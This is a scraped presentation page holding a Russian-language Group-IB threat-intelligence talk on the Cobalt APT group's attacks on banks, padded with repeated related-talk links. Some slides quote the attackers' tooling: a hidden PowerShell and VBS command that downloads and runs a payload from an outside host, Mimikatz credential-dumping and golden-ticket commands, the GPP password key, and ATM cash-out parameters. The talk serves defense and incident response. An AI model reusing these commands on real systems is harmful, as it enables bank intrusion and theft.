Мария Комиссарова, ЦБ РФ: «Экспертиза предмета залога»
Мария Комиссарова, ЦБ РФ: «Экспертиза предмета залога»Мария Комиссарова, ЦБ РФ: «Экспертиза предмета залога»
Мария Комиссарова, ЦБ РФ: «Экспертиза предмета залога»Банковское обозрение
 
Симбиоз DLP и SIEM. Комплексный подход к обеспечению информационной безопасно...
Симбиоз DLP и SIEM. Комплексный подход к обеспечению информационной безопасно...Симбиоз DLP и SIEM. Комплексный подход к обеспечению информационной безопасно...
Симбиоз DLP и SIEM. Комплексный подход к обеспечению информационной безопасно...Банковское обозрение
 
Анти-фрод системы: правовые и технические аспекты, перспективы применения и к...
Анти-фрод системы: правовые и технические аспекты, перспективы применения и к...Анти-фрод системы: правовые и технические аспекты, перспективы применения и к...
Анти-фрод системы: правовые и технические аспекты, перспективы применения и к...Банковское обозрение
 
Национальная биометрическая платформа. Григорий Сальников, РТЛабс
Национальная биометрическая платформа. Григорий Сальников, РТЛабсНациональная биометрическая платформа. Григорий Сальников, РТЛабс
Национальная биометрическая платформа. Григорий Сальников, РТЛабсБанковское обозрение
 
Готовы ли Ваши клиенты противостоять информационным угрозам? Антонян Сергей, ...
Готовы ли Ваши клиенты противостоять информационным угрозам? Антонян Сергей, ...Готовы ли Ваши клиенты противостоять информационным угрозам? Антонян Сергей, ...
Готовы ли Ваши клиенты противостоять информационным угрозам? Антонян Сергей, ...Банковское обозрение
 

More from Банковское обозрение (20)

Галина Горшенина, АРБ: «Оценка для целей залога земель сельскохозяйственного ...
Галина Горшенина, АРБ: «Оценка для целей залога земель сельскохозяйственного ...Галина Горшенина, АРБ: «Оценка для целей залога земель сельскохозяйственного ...
Галина Горшенина, АРБ: «Оценка для целей залога земель сельскохозяйственного ...
 
Максим Русаков, SRG: «Автоматизация контроля залоговой стоимости недвижимости»
Максим Русаков, SRG: «Автоматизация контроля залоговой стоимости недвижимости»Максим Русаков, SRG: «Автоматизация контроля залоговой стоимости недвижимости»
Максим Русаков, SRG: «Автоматизация контроля залоговой стоимости недвижимости»
 
Евгений Федоров. НАОК: «Сотрудничество с банками в смежных с оценкой областях»
Евгений Федоров. НАОК: «Сотрудничество с банками в смежных с оценкой областях»Евгений Федоров. НАОК: «Сотрудничество с банками в смежных с оценкой областях»
Евгений Федоров. НАОК: «Сотрудничество с банками в смежных с оценкой областях»
 
Владимир Гамза, ТПП РФ: «Проблемы использования объектов интеллектуальной соб...
Владимир Гамза, ТПП РФ: «Проблемы использования объектов интеллектуальной соб...Владимир Гамза, ТПП РФ: «Проблемы использования объектов интеллектуальной соб...
Владимир Гамза, ТПП РФ: «Проблемы использования объектов интеллектуальной соб...
 
Сергей Федоренков, ТрансКапиталБанк: «Оптимизация процессов залогового сервиса»
Сергей Федоренков, ТрансКапиталБанк: «Оптимизация процессов залогового сервиса»Сергей Федоренков, ТрансКапиталБанк: «Оптимизация процессов залогового сервиса»
Сергей Федоренков, ТрансКапиталБанк: «Оптимизация процессов залогового сервиса»
 
Константин Клепак, МТС-Банк: «Некоторые особенности залога отдельных видов им...
Константин Клепак, МТС-Банк: «Некоторые особенности залога отдельных видов им...Константин Клепак, МТС-Банк: «Некоторые особенности залога отдельных видов им...
Константин Клепак, МТС-Банк: «Некоторые особенности залога отдельных видов им...
 
Алексей Кравцов, Арбитражный третейский суд Москвы: «Как добиться взыскания з...
Алексей Кравцов, Арбитражный третейский суд Москвы: «Как добиться взыскания з...Алексей Кравцов, Арбитражный третейский суд Москвы: «Как добиться взыскания з...
Алексей Кравцов, Арбитражный третейский суд Москвы: «Как добиться взыскания з...
 
Ирина Вишневская, «Беркшир Адвайзори Групп»: «Ликвидность залогов»
Ирина Вишневская, «Беркшир Адвайзори Групп»: «Ликвидность залогов»Ирина Вишневская, «Беркшир Адвайзори Групп»: «Ликвидность залогов»
Ирина Вишневская, «Беркшир Адвайзори Групп»: «Ликвидность залогов»
 
Олег Визгалин, ВЭБ: «Управление залогом. Новые возможности и перспективы»
Олег Визгалин, ВЭБ: «Управление залогом. Новые возможности и перспективы»Олег Визгалин, ВЭБ: «Управление залогом. Новые возможности и перспективы»
Олег Визгалин, ВЭБ: «Управление залогом. Новые возможности и перспективы»
 
Александр Сагин, Федеральная нотариальная палата: «Реестр уведомлений о залог...
Александр Сагин, Федеральная нотариальная палата: «Реестр уведомлений о залог...Александр Сагин, Федеральная нотариальная палата: «Реестр уведомлений о залог...
Александр Сагин, Федеральная нотариальная палата: «Реестр уведомлений о залог...
 
Оксана Мишининская, Росреестр: «Сервис по государственной регистрации прав в ...
Оксана Мишининская, Росреестр: «Сервис по государственной регистрации прав в ...Оксана Мишининская, Росреестр: «Сервис по государственной регистрации прав в ...
Оксана Мишининская, Росреестр: «Сервис по государственной регистрации прав в ...
 
Павел Русаков, «Мобильный оценщик»: «Автоматизация оценки и управления недвиж...
Павел Русаков, «Мобильный оценщик»: «Автоматизация оценки и управления недвиж...Павел Русаков, «Мобильный оценщик»: «Автоматизация оценки и управления недвиж...
Павел Русаков, «Мобильный оценщик»: «Автоматизация оценки и управления недвиж...
 
Галина Горшенина, АРБ: «Оценка для целей залога земель сельскохозяйственного ...
Галина Горшенина, АРБ: «Оценка для целей залога земель сельскохозяйственного ...Галина Горшенина, АРБ: «Оценка для целей залога земель сельскохозяйственного ...
Галина Горшенина, АРБ: «Оценка для целей залога земель сельскохозяйственного ...
 
Александр Слуцкий, НАОК: «Изменения в федеральный стандарт оценки «Оценка для...
Александр Слуцкий, НАОК: «Изменения в федеральный стандарт оценки «Оценка для...Александр Слуцкий, НАОК: «Изменения в федеральный стандарт оценки «Оценка для...
Александр Слуцкий, НАОК: «Изменения в федеральный стандарт оценки «Оценка для...
 
Татьяна Морозова, ЦБ РФ: «Применение норм Инструкций Банка России № 176-И, 14...
Татьяна Морозова, ЦБ РФ: «Применение норм Инструкций Банка России № 176-И, 14...Татьяна Морозова, ЦБ РФ: «Применение норм Инструкций Банка России № 176-И, 14...
Татьяна Морозова, ЦБ РФ: «Применение норм Инструкций Банка России № 176-И, 14...
 
Мария Комиссарова, ЦБ РФ: «Экспертиза предмета залога»
Мария Комиссарова, ЦБ РФ: «Экспертиза предмета залога»Мария Комиссарова, ЦБ РФ: «Экспертиза предмета залога»
Мария Комиссарова, ЦБ РФ: «Экспертиза предмета залога»
 
Симбиоз DLP и SIEM. Комплексный подход к обеспечению информационной безопасно...
Симбиоз DLP и SIEM. Комплексный подход к обеспечению информационной безопасно...Симбиоз DLP и SIEM. Комплексный подход к обеспечению информационной безопасно...
Симбиоз DLP и SIEM. Комплексный подход к обеспечению информационной безопасно...
 
Анти-фрод системы: правовые и технические аспекты, перспективы применения и к...
Анти-фрод системы: правовые и технические аспекты, перспективы применения и к...Анти-фрод системы: правовые и технические аспекты, перспективы применения и к...
Анти-фрод системы: правовые и технические аспекты, перспективы применения и к...
 
Национальная биометрическая платформа. Григорий Сальников, РТЛабс
Национальная биометрическая платформа. Григорий Сальников, РТЛабсНациональная биометрическая платформа. Григорий Сальников, РТЛабс
Национальная биометрическая платформа. Григорий Сальников, РТЛабс
 
Готовы ли Ваши клиенты противостоять информационным угрозам? Антонян Сергей, ...
Готовы ли Ваши клиенты противостоять информационным угрозам? Антонян Сергей, ...Готовы ли Ваши клиенты противостоять информационным угрозам? Антонян Сергей, ...
Готовы ли Ваши клиенты противостоять информационным угрозам? Антонян Сергей, ...
 

Жизнь богаче схем ( APT Cobalt на кончиках пальцев). Сергей Золотухин, Group-IB

  • 1. 1 Жизнь богаче схем ( APT Cobalt на кончиках пальцев) Докладчик: Сергей Золотухин Менеджер по развитию бизнеса Group-IB
  • 2. GROUP-IB.COM Временная шкала целевых атак *Cobalt was detected in June 2
  • 3. 3 Почему невозможно быть полностью защищенным ТЫСЯЧИ СОТРУДНИКОВ Не все сотрудники эксперты по безопасности. Им надо получать и открывать письма от коллег, руководства и т.д. для выполнения своих служебных обязанностей Атакующие могут звонить прежде чем отправить письмо, воспользоваться взломанной почтой коллег Многие просто покупают решения по безопасности и чувствуют себя защищёнными, перекладывая ответственность на вендора. Нет процедуры реагирования на инцидент УМНЫЙ ФИШИНГ СТАРАЯ ПАРАДИГМА 10 минут время необходимое для получения полного контроля над сетью
  • 4. 4 Шаблон атак легко копировать 1 Целевой фишинг, покупка загрузок, уязвимость во внешней системе Собирают реквизиты доступа к центральным серверам и пароли администраторов использую открытую утилиту Mimikatz НАЧАЛЬНОЕ ПРОНИКНОВЕНИЕ 2 УДАЛЕННЫЙ ДОСТУП 3 ПОЛУЧЕНИЕ ПРИВИЛЕГИЙ 6 ПРОТИВОДЕЙСТВИЕ РАССЛЕДОВАНИЮ Атакующие используют удаленный доступ для более глубокого проникновения в сети Атакующие ищут компьютеры с которых можно получить доступ к критичным системам (АРМ КБР, SWIFT, карточный процессинг, системы управления банкоматами) Получают доступ к системам, как легитимный оператор, наблюдают за ним и выполняют те же действия Уничтожают данные после атаки и компьютеры 5 ЗАВЕРШЕНИЕ АТАКИ4 СБОР ДАННЫХ
  • 6. 6 Закрепление на локальной системе ЭКСПЛОЙТ, EXE, VBS-СКРИПТ Троян в зашифрованном архиве CVE-2015-1641 VBS скрипт Вредоносный модуль загружается и храниться только в оперативной памяти Получение списка легитимного ПО в автозагрузке и замена исполняемых файлов: • iusb3mon. exe (Intel(R) USB 3.0 eXtensible Host Controller) • jusched.exe (Sun Java Update Scheduler) Либо создания задач в Windows Scheduler ОПЕРАТИВНАЯ ПАМЯТЬ АВТОЗАГРУЗКА И ЛЕГАЛЬНОЕ ПО PowerShell скрипт: «C:Windowssystem32cmd.exe - powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://84.200.84.241:800/arp'))» VBS скрипт: var u = 'https://filebin.net/1xpzydyqftzdm48k/cmd.exe'.split(',');for(i = 0; i < u.length; i++){try{var h = new ActiveXObject('msxml2.xmlhttp');h.open('GET', u[i], false);h.send();if(h.status == 200 && h.responsetext.substr(0, 2) == 'MZ')
  • 7. 7 Повышение привилегий ОШИБКА КОНФИГУРАЦИИ КОНТРОЛЛЕРА ДОМЕНА • Использование Group Policy Preferences (GPP) • «[server_name]sysvol[domain_name]Policies[group_policy_na me]MachinePreferencesGroupsGroups.xml» • Из файла Groups.xml они извлекают логин и пароль администратора домена из полей cpassword и userName. (пароль в зашифрованном с помощью AES-256 алгоритме и закодированном по Base64) • Для получения пароля в открытом виде атакующие декодируют пароль по Base64 • Полученный зашифрованный пароль расшифровывается с помощью ключа 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a43 3b66c1b
  • 8. 8 Повышение привилегий УТИЛИТА MIMIKATZ Есть доступ к DC mimikatz sekurlsa::logonpasswords Нет доступа к DC, но есть LA Подключение к рабочим станциям и серверам с целью поиска учетной записи с доступом к DC Нет прав LA и нет доступа к DC CVE-2014-4113, CVE-2015-1701, CVE-2015-2363 и CVE-2015-2426, которые позволяли поднять привилегии до уровня SYSTEM на x32 и x64. Если на локальной системе не работает, то подключается к другим хостам пока не найдет уязвимый Золотой билет • "privilege::debug" "lsadump::samrpc /patch" exit • извлечение NTLM-хеш учетной записи krbtgt (Key Distribution Center Service Account) • создают файл с золотым TGT билетом
  • 9. 9 Поиск нужных систем с доступом к банкоматной сети netscan.exe – сетевой сканнер NetScan patch86.exe – патчинг Termsrv для поддержки одновременных терминальных сессий plink.exe – консольный ssh клиент для Windows psexec.exe – консольная утили для удаленного управления на Windows
  • 10. 10 Удаленный доступ • Легальный удаленный доступ • HideVNC • TeamViewer • AmmyAdmin
  • 11. 11 Программы для банкоматов ServiceLogicalName - имя сервиса, используемое в качестве аргумента для функции WFSOpen (например «Cash Dispenser Module»). Cassettes Count - общее число кассет, присутствующих на устройстве. Значение должно быть в интервале от 1 до 15. Cassette Number - номер кассеты, из которой следует выдать наличность. Значение должно быть в интервале от 1 до 15. Banknotes Count - число банкнот, которое необходимо выдать из кассеты. Значение должно быть в интервале от 1 до 60. Dispenses Count - означает какое количество раз необходимо повторить выдачу наличности. Значение должно быть в интервале от 1 до 60. Программа, использует стандартные функции по интерфейсу XFS через XFS Manager (eXtensions for Financial Services).
  • 13. 13 Система выявления ранее неизвестного вредоносного кода с использованием передовых алгоритмов машинного обучения Скачиваемые файлы Объекты, скачиваемые пользователями и их компьютерами при атаке их браузеров и другие ранее неизвестные вредоносные объекты, не определяемые антивирусами и сигнатурным подходом. Круглосуточная поддержка вашей службы безопасности и сопровождение процесса реагирования опытными специалистами Group-IB Полная конфиденциальность – обработка и анализ файлов внутри вашего контура безопасности Почтовые вложения Вредоносные файлы, получаемые пользователями через почтовую систему в ходе целевых атак и применения социальной инженерии Целевые атаки Вредоносное ПО, нацеленное эксклюзивно на вашу инфраструктуру
  • 14. 1 4 Сенсор анализа трафика SOC GROUP-IB Сведения об инцидентах, полученные от сенсора, классифицируются и коррелируются в Центре обработки данных. События анализируются квалифицированными специалистами Group-IB вручную. Эксперты SOC уведомят ваших специалистов о критичных угрозах по телефону и e-mail, а все результаты анализа будут доступны в удобном web-интерфейсе. Опытные специалисты Group-IB берут на себя работу по выявлению критичных инцидентов, позволяя вашей службе ИБ сосредоточиться на реагировании. выявляет зараженные узлы, устанавливая их взаимодействия с командными центрами по признакамвредоносной активности, разрабатываемым на основе данных из уникальных источников. детектирует сетевые аномалии, генерируемые вредоносными программами, при помощи алгоритмов машинного обучения. интегрируется с системой поведенческого анализа Polygon для выявления ранее неизвестного вредоносного кода. передает информацию о выявленных инцидентах в SOC Group-IB по безопасному каналу либо в любую внутреннюю корпоративную систему учета событий ИБ. Анализ данных ведется круглосуточно, без выходных Как работает TDS
  • 15. Как выглядит Cobalt при запуске файла на TDS Polygon
  • 16. Результат проверки на TDS Polygon: оценка вредоносности
  • 21. Результат проверки на TDS Polygon: связанные события
  • 22. Рассылка Cobalt 10 марта 2017г Первая волна 10.03.2017, 12:57, Банк 1 Вторая волна 10.03.2017, 15:12, Банк 2 Адрес: media@ecb-europe.com
  • 23. 23 Что делать, чтобы предотвратить APT атаку КИБЕРРАЗВЕДКА ОБНАРУЖЕНИЕ РЕАГИРОВАНИЕ Отслеживайте появление новых методов и инструментов атак Используйте специальные системы обнаружения целевых атак При обнаружении следов атаки вызывайте команду профессиональных криминалистов Присылайте подозрительные файлы для анализа – intelligence@group- ib.ru АНАЛИЗ Анализируйте подозрительные файлы в изолированной среде Запишитесь на бесплатный тест-драйв комплекса TDS + Polygon - www.group-ib.ru/tds.html ЦЕНТР РЕАГИРОВАНИЯ CERT-GIB Круглосуточная помощь опытных специалистов в реагировании на инциденты РАССЛЕДОВАНИЯ И КРИМИНАЛИСТИКА Безупречный сбор доказательной базы и оперативное установление личностей преступников
  • 24. facebook.com/group-ib info@group-ib.ruwww.group-ib.ru twitter.com/groupib +7 495 984 33 64blog.group-ib.ru Предотвращаем и расследуем киберпреступления с 2003 года.